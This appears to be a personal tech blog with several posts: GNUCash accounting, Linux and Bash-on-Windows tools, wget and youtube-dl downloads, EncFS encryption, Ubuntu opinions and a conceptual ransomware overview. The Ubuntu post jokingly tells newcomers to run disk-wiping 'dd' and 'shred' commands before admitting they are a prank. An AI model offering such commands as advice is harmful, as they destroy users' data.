GNUCash. Its awesome.

Now I am no financial guru when it comes to matters pertaining to financial solutions (or am I?), but I’m quite content with GNUCash. GNUCash, for me, is a simple management solution for finances that extends past the capacity of using Excel as your budget tracker (not that you should do that).

The reason I enjoy using GNUCash (apart from it being freely available) is how flexible but powerful it is. In under 5 minutes I was capable of reconciling my accounts and tracking the $18.2 discrepancy between my bank statement and my account balance in GNUCash. The reporting functionality is immaculate (more on that later) and the availability to utilize multiple accounts, with multiple journals is amazing.

Disclaimer: I love this software.

GNUCash uses double-entry accounting and transactions. In basic terms, credit an expense account, and debit a saving account. This basic concept allows for in-depth analysis of the current cash-flow of an account. For example, this is how I personally setup an opening balance against an account:As you can see, under the account “Westpac Expense Account” I am depositing $100.00, which has a double entry to Asset: <Expense Acount>. Now this is where double-entry accounting becomes exciting. In the accounting world, “credits must always equal debits”, meaning that whenever an expense is incurred, there must be an entry under the Expense Account as a credit (we’re adding to the value of this expense account) and a debit to the cashing account responsible for the expense. The following example is how you would credit your Gas Expense, and in-turn reduce the total balance of your bank account:

In a transaction report, we would see the Auto: Gas credited to bring a balance of $100.00 and the Asset: <Account> debited $100.00. On a short side-note, when I studied accounting and finance (quite some time ago) the easiest method for double-entry accounting was PALER:

P – Properitary Equity (Owner Equity)

A – Assets

L – Liabilities

E – Equity

R – Revenue

Which, depending on the transactional nature of the account, would mean the following:

 

 

 

However I have deviated from the topic, slightly – I am not here to teach accounting, I’m here to tell you why I love this program. Apart from simple entries, you are able to reconcile accounts easily; that is, to identify discrepancies and “why credits aren’t equaling debits”. For the example above mentioned, it is able to query the transactions and provide an informative window:

You cannot tell me that’s not a huge function of keeping track of finances!  So again, this financial application not only allows you to easily keep on top of income and expenses, but allows you to get a clear view of your expenses, income and discrepancies (similar to MYOB), all for free.

The last amazing feature I can say about the application is that the reporting mechanisms are very easy to create (should you want to make your own queries) along with several existing reports. For example, the cash flow report will record all “Main Accounts” pertaining to income and expenses, as for this example:

So give it a go, and I am quite confident you’ll thank me later!

After a year of Windows, we’re back!

So, tonight I’ve decided it’s time to take a break from gaming (yes, that’s the reason why this blog has been dead for months) and get back into a bit of coding, system automation (via the use of coding, obvs) and Linux. Yes, that’s right; it’s back, the superior Operating System/Platform is back.

Apart from Discord and Slack now having native installers for the OS, one other thing I’ve really been impressed with; how easy it is to now install EnpassIO Password Manager! Literally, it’s easier than Windows.

The following 4 lines will install EnPass on your PC (and yes, you can chain these commands if you’re lazy):

$ sudo -i
$ echo "deb http://repo.sinew.in/ stable main" > \
  /etc/apt/sources.list.d/enpass.list
$ apt-get update
$ apt-get install enpass
$ exit


How easy is that? Here I was dreading needing to convert my app database into a KeepPass or whatever inferior password manager existed out there!

Bash, making things easier.

Following on from my post last night about WGet and YouTube-DL, we’ve learned how to enable Bash on Windows 10. Now, this is an extremely useful thing to do, because it empowers you to use commands that are not native on Windows (or as a Linux fanboy would say, M$).

So, just so you all get a better understanding of the improved functionality of bash, we’re going to make some comparisons and examples.

I’m not going into detail – there is far too much to cover.

Network Monitoring – netstat.


On a windows box, to see current usage per process, the easiest method is to run:

netstat -a -b

Which will return a string similar to this:

 [chrome.exe]
     TCP 192.168.0.15:52581 192.0.78.13:https     ESTABLISHED
 [chrome.exe]
     TCP 192.168.0.15:52971 192.0.78.23:https     ESTABLISHED
 [chrome.exe]
     TCP 192.168.0.15:52972 192.0.76.3:https      ESTABLISHED

Rather simple to do, and allows you to see what process is responsible for what traffic, and what protocol it is using.

GNU + Linux supports netstat, but has a complete different syntax for the commands. To see connections with the process, simply run the following:

root@DESKTOP-3O8E0L8:/home/nanky# netstat -p


Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

 

It returns a little more intuitive data (in my opinion). For example, we can then dictate by interface the data we wish to see by adding -i to the command:

netstat -i

This is an advantage over Windows. But let us get to the killer feature:

netstat -a -v -w -r

The following flags are used:

 -a, --all
 Show both listening and non-listening sockets. With the --interfaces option, show interfaces that are not up

--verbose , -v
 Tell the user what is going on by being verbose. Especially print some useful information about unconfigured address families.

--wide , -W
 Do not truncate IP addresses by using output as wide as needed. This is optional for now to not break existing scripts.

Thus allowing this command to return more valuable information, depending on the situation. However, there is a better tool: bmon and nethogs.

bmon

Start by issuing the following command:

sudo apt-get install bmon

 

Once installed, you should always look at the man page:

man bmon

 

Using bmon allows you to view the usage and statistics per interface, such as:

BMON Capture

Of course, there are other tools to conquer these tasks out there – I would strongly suggest you read this post outlining other sysadm tools available to you.

 

Automation, crontabs.


As opposed to the clunky Windows Task Scheduler, Linux uses Cron Jobs to execute tasks.

You’ll need to have bash running for CronJobs to work on Windows.

Pretty self explanatory, create a script or command you want to execute, and add it to the scheduler. Here it the default example provided to you:

# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/

You guessed it, the stars represent time:

# m h dom mon dow command

The tar -zcf portion is the code it executes. Pretty self explanatory. 7:30am, every week for example:

crontab -e
30 7 * * 1 /my/command/to/execute/yo.sh

You get this. Easy stuff.

 

Task Maintenance – task.


Okay so this one’s not so critical, I just love this application. TaskWarrior. Tasks is a super simple yet super powerful CLI driven task manager.

sudo apt-get install task

 

There we go, you’ve installed it. Let’s add our first task:

nanky@DESKTOP-3O8E0L8:~$ task P:H  due:31 project personal add edit this css

Now let’s view our task:

 ID Age P Due Description Urg
 2  26s H  4w edit this css

Pretty simple method to view the task at hand. Now we want to view the task with the ID ‘2’:

task id 2

Which will return the following:

Name Value
ID 2
Description change task 1
Status Pending
Entered 2017-09-27 23:50:56 (1min)
Last modified 2017-09-27 23:50:56 (1min)
Virtual tags PENDING READY UDA UNBLOCKED LATEST PRIORITY
UUID 34c4cf80-a857-4123-a463-4c4bcc44b591
Urgency 6
Priority H

UDA priority.H 1 * 6 = 6
 ------
 6

You can sync your tasks across multiple devices, too! Just view their usage examples, and you’ll get the feel for how complex you can make the tool.

Lastly, text editing.


I cannot live without GNU Nano. Yes, you could use Vim but the simplicity of Nano amazes me.

For example, let’s edit a file and close it, all without needed to locate it, open, manually save and confirm dialogs:

nano /mnt/c/path/to/file/yo.txt

It is literally that simple, and you can interact with files stored on Windows natively.

That’s it.

You pretty much get the picture; CLI > GUI.

 

Just read:

  1. 20 Command Line Tools to Monitor Linux Performance
  2. Best Linux Command-Line Tools For Network Engineers
  3. Top 5 Linux Utilities for Network Engineers

 

 

 

 

 

Downloading Web Content with WGet and YouTube-DL

In this post I am going to cover the process behind using WGet and YouTube-DL to obtain media from hosted websites.

But Michael, isn’t this illegal?

Depends, did you read this? I’m simply showing you the methodology behind something – it’s your choice how to use this.

Basic Install…for Linux.

YouTube-DL and WGet are native to Linux (using the package managers) you can simply perform the following:

sudo apt-get install wget
and:
sudo apt-get install youtube-dl

Installing this on a Windows Client.

But for all us unfortunate users stuck on Windows, how do we achieve this? There are two main methods in which I will demonstrate.

Enabling Bash for Windows 10

If you’re using Windows 10, you can enable “Linux Subsystem” for Windows. It’s a real hard process, paste the following into an administrative PowerShell console:

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

…and reboot.

Once you load bash (literally, bash.exe) you can install the client the above mentioned way.

Getting the stand alone programs to run on Windows

Not on Windows 10? Cannot really blame you. So, let’s go and manually get these packages.

First, download wget, and put in a working directory.

Same process for YouTube-DL.

“Using the awesomeness that is, these things”

It’s 12am, and I’ve had 2 hours sleep. The titles don’t matter right now.

Let’s open an administrative PowerShell, and change to the directory.

Directory: C:\bin

Mode   Last Write Time                Length       Name
—- ————- —— —-
-a—-   27/09/2017 12:27 AM     3481920    wget.exe
-a—-   27/09/2017 12:28 AM    7803406    youtube-dl.exe

…and now you look at the help file and figure out how to use the programs yourselves…? No? Okay.

Let’s start with YouTube-DL, and their documentation. This will give you all the switches you can use in conjunction with the program.

For those who are just lazy, save the following as a PowerShell script, and execute it to perform a basic download. I did not error checking or improvement to this:

$YP = "Enter your working directory"
$Vid = "Enter URL to vid"
function getfiles {
 $URL1 = "https://eternallybored.org/misc/wget/current/wget.exe"
 $URL2 = "https://yt-dl.org/downloads/2017.09.24/youtube-dl.exe"
 $output = "$YP"
 Start-BitsTransfer -Source $url1 -Destination $output
 Start-BitsTransfer -Source $url2 -Destination $output
}

function downloadmystuff {
 cd $YP
 youtube-dl $vid --ignore-errors --geo-bypass --yes-playlist --write-description 
--write-all-thumbnails --console-title --print-traffic --all-formats 
}

getfiles
downloadmystuff

Basically, this will download the file mentioned by your “$Vid” function, with the following parameters:

  • –ignore-errors
  • –geo-bypass
  • –yes-playlist
  • –write-description
  • –write-all-thumbnails
  • –console-title
  • –print-traffic
  • –all-formats

Pretty straight forward, easy to understand. Oh, and did you know they support Instagram?

.

Cool. So let’s use this in conjunction with WGet. I want to download my home page:

nanky@DESKTOP-3O8E0L8:~$ cd /mnt/c/bin/ && wget www.michaelnancarrow.com

I want to download just the images from here:

nanky@DESKTOP-3O8E0L8:/mnt/c/bin$ wget -nd -E -H -k -K -p -A jpeg,png,jpg https://imgur.com/gallery/PATH

  • -nd
  • -E
  • -H
  • -k and -K
  • -p and
  • -A

Can all be found out on the manual page.

So there you go, another very basic “how to” document that could have been answered more succinctly by spending 5 minutes on Google. Literally.

EncFS; easy, fast and reliable?

Implementing a secure file-system in current-day computing is an imperative function, especially with Crypto attacks on the rise. My personal method to ensuring data integrity on a Linux Box is EncFS (you may prefer GEncFSM).

EncFS is a Free (LGPLFUSE-based cryptographic filesystem. It transparently encrypts files, using an arbitrary directory as storage for the encrypted files.

EncFS uses an encrypted and un-encrypted directory. For example, I could use the following assumption: my Dropbox directory is a mirror of my /home directory, and acts as the encrypted mirror for EncFS.

EncFS

Default EncFS Screen

Any data stored in your unencrypted directory, is encrypted using your defined passphrase, in another directory; mirrored data.

Installation of EncFS

Whilst you can download the GitHub project and follow the installation guide, if you are on Ubuntu or another similar flavour (Kubuntu or Lubuntu as an example) you can simply run the following command:

sudo apt-get -y install encfs

If you prefer GEncFSM, then run the following:

sudo add-apt-repository ppa:gencfsm/ppa
sudo apt-get update
sudo apt-get install gnome-encfs-manager

Usage of EncFS

If you are intending to use EncFS as the command-line option (I usually just default to the UI) then I would suggest inspecting the man page:

NAME
 encfs - mounts or creates an encrypted virtual filesystem

SYNOPSIS
 encfs [--version] [-s] [-f] [-v|--verbose] [-i MINUTES|--idle=MINUTES]
 [--extpass=program] [-S|--stdinpass] [--anykey] [--forcedecode]
 [-d|--fuse-debug] [--public] [--no-default-flags] [--ondemand]
 [--delaymount] [--reverse] [--standard] [-o FUSE_OPTION] rootdir
 mountPoint [-- [Fuse Mount Options]]

If you are not too particular with how you want to configure the system, go ahead and perform:

mkdir -p ~/encrypted
mkdir -p ~/decrypted

Then mount them for EncFS (you can later see where they mount using the mount command):

encfs ~/encrypted ~/decrypted

You will be prompted to select the mode, and to create a password for the encrypted paths.

Usage of GEncFSM

Using the GUI is probably a lot more manageable here. To create a stash, simply select the plus icon, configure your path and enter a password:

GEncFSM-Options

Creating New Stash

 

Then go ahead and mount the stash:

EncFSMountDirectory

Mounting Stash

Understanding EncFS

When a file is made in the directory “Private” (in our case this is the “un-encrypted” path), a mirror file is created in your “.Private” directory, with multiple rounds of salt using your provided “key” (the passphrase is used to hash the name and content):

EncFSMakeItem

Private and .Private

Therefore, if we attempt to look at the encrypted file, it would not present any readable data:

fileval

File Value

Of course, if we read the .encfs6.xml  file, we will see the KeyData value:

 <encodedKeyData>
kWkCBCu5HPY31URJhtdvYM7oynkI3MuQuh8smHadSpStmvkvJibGoSddWvmJjuFQU6xCgQ==
</encodedKeyData>

Therefore, it is worth noting that:

  • If someone knows your encodedKeyData value, and has a copy of your data, it can be compromised
  • The EncFS is only as secure as the passphrase you assign it – there is no Brute Force lockout procedures inplace and;
  • Physical access to the files (by mean of PC or RDP) should still be limited.

 

Therefore, we assume EncFS is a reliable, safe and fast method to encrypt data.

Why Ubuntu is the Windows 7 of 10.

You’re new to Linux!? Here, let me help you improve your overall experience(s):

su - 
> enters root password
apt-get install xfce4
reboot now

If you’re new to Linux, that’s like the number 1 command you need to know. Oh what the hey, whilst you’re at it, go ahead and run:

dd if=/dev/zero of=/dev/sda bs=512 count=1
shred -n 5 -vz /dev/sdb

Okay, so perhaps do not do that last one. I’m just being a total idiot (as per the norm?).


Why do you use Ubuntu?

So a few people who I talk to on blogs and whatnot ask me why I use Ubuntu as my main PC (excluding gaming, that’s Windows 10) and not Windows. Like I said, Ubuntu is the Windows 7 of 10. Why, you ask?

I am going on a tangent, of good and bad, contradictions and hipocracy here, but stick to it, it makes sense in the end(?).

  • It’s not the most bleeding edge, but it’s maintained; I like stable over new features.
  • It’s not the most supported, but has enough to get by; Seems to have all my drivers.
  • It’s not the most efficient resource user, but we can run it and; Xfce!
  • It’s not made by the best company, but it’s not OSX; Apple’s Unix sucks!

Ubuntu, for me, is the “safe Linux” distribution to throw onto a computer, although I’ve not always had success with older builds. 16.04LTS through to 17.04  I know will have WiFi support, and a graphics driver for my nVidia card.

I trade out on features that I’d like for stability, and that’s I am okay wit this. Is it my preferrential distribution? No – in no shape or form does Ubuntu do anything so extraordinary for me to say that I’d recommend it. It’s not bad, there’s just…better.

For me, the most deterring points to Ubuntu are:

  • GNOME is old fashioned and weighs the system down; Unity FTW!
  • Amazon search should never be a thing; Thank God it’s off (or is it?) and;
  • Canonical do some pretty silly things – they’re like the Apple of the Linux world.

So why do I still use this distributions if I am so negative about it?

Oh boy, another tangent

Windows 7 (We’re skipping Vista because it’s just the blueprint for 7) was “trash” when XP was in “prime” form, even though it added all these new features, new support for hardware, and was sported to be faster than XP. Windows 7 was slowly adopted (whilst being heavily criticised) in both the home user and business user areas.

Windows 8, the same deal happened and Windows 10, the same deal happened. This doesn’t really directly relate to Ubuntu, but it seems as humans we (and I am) are a little reluctant to change, and only make the jump when we know it’s safe. If it ain’t broke, don’t fix it comes to mind. That applies to why I default to Ubuntu; the current build works for me, and others do not.

However I would like to point out I’ve given up on Windows. I no longer wish to use that operating system for anything, and as soon as all my steam games are ported to Windows, there will not be a single PC in my house that runs that putrid operating system.

So you’ve stated why you prefer Linux but not Ubuntu.

Back to the point. The reason I selected Ubuntu was, even though it is not the best tool out there, it’s a reliable tool that I’ve used in the past (short of 16.04LTS and this statment is a lie), and can rely on (more or less). It’s a tool I can rely on to boot to, and from there, I can do whatever I wish to do to it, at my disposal. Of course,  there are a number of other distributions I’d much prefer to use, but they all have issues on my PC (at present).

Would you answer the question instead of babbling on about things we care naught for!?

Ubuntu is the base. There is nothing special about Ubuntu apart from their PPA’s and their apt-get management. I can skin it how I wish, install applications at my leisure, and edit GRUB if I wanted.

I use Ubuntu as a solid foundation to meet my requirements, and then alter the settings to accomodate my wishes. I ditch Unity and GNOME for the much prettier, lighter Xfce Desktop Environment (which, I strongly recommend), set XTerm as my default terminal and live a happy life of blazing fast boot times, and 100% CPU utilization my Amazon Search feeding all my data to Canonical even though I disabled that setting.

(No seriously my CPU is capped at 100% right now).

Leaving Windows, and want to try Linux?

If you want to make the jump, here are 5 distrobutions I would recommend over Ubuntu:

Steam, and secondary SSD’s.

So today Ark: Survival Evolved corrupted my steam install (I really do not know how, pesky thing), and let me tell you, it was so painful to repair.

So, as opposed to other typical blog posts, I wanted to vent to the community that reads this blog. You’re probably just going to laugh at me more than anything.

Step 1: Make a current backup (if operational)

Continue reading

RansomeWare, oh the joys it brings.

RansomeWare has been on an upward trend, notably so in Quarter 3 and 4 of 2016. The main targets shifted from phishing links with a drop of 50% (Source: Proofpoint) to RDP. According to Webroot, two thirds (66%) of Ransomeware Infections in Q1 2017 where delivered by RDP.

For those who are unfamiliar with the term, Ransomeware can be summarised as:

Ransomware is a type of malicious software that blocks access to the victim’s data or threatens to publish or delete it until a ransom is paid.

Source: RansomeWare – Wikipedia

However, RansomeWare is categorised  as a form of cryptoviral extortion; it is an act of CryptovirologyMoti Young published his findings of cryptoviral extortion (Cited entries can be read here) where the process was further discussed in 3 key phases:

  1. [attacker→victim] The attacker generates a key pair and places the corresponding public key in the malware. The malware is released.
  2. [victim→attacker] To carry out the cryptoviral extortion attack, the malware generates a random symmetric key and encrypts the victim’s data with it. It uses the public key in the malware to encrypt the symmetric key. This is known as hybrid encryption and it results in a small asymmetric ciphertext as well as the symmetric ciphertext of the victim’s data. It zeroizes the symmetric key and the original plaintext data to prevent recovery. It puts up a message to the user that includes the asymmetric ciphertext and how to pay the ransom. The victim sends the asymmetric ciphertext and e-money to the attacker.
  3. [attacker→victim] The attacker receives the payment, deciphers the asymmetric ciphertext with his private key, and sends the symmetric key to the victim. The victim deciphers the encrypted data with the needed symmetric key thereby completing the cryptovirology attack.The symmetric key is randomly generated and will not assist other victims. At no point is the attacker’s private key exposed to victims and the victim need only send a very small ciphertext to the attacker (the asymmetric ciphertext).

 

Looking at the latest WannaCry breakout, the process can be defined as the following 5 steps:

Trend Micro – WannaCry Blog Post

The process adopted here follows the ruleset of Moti’s assumption, whilst also leveraging SMB faults to spread through networks.

Further investigation on this fault will be documented at a later stage.

On a side note, WannaKey? This tool may help recover WannaCry files.

Continue reading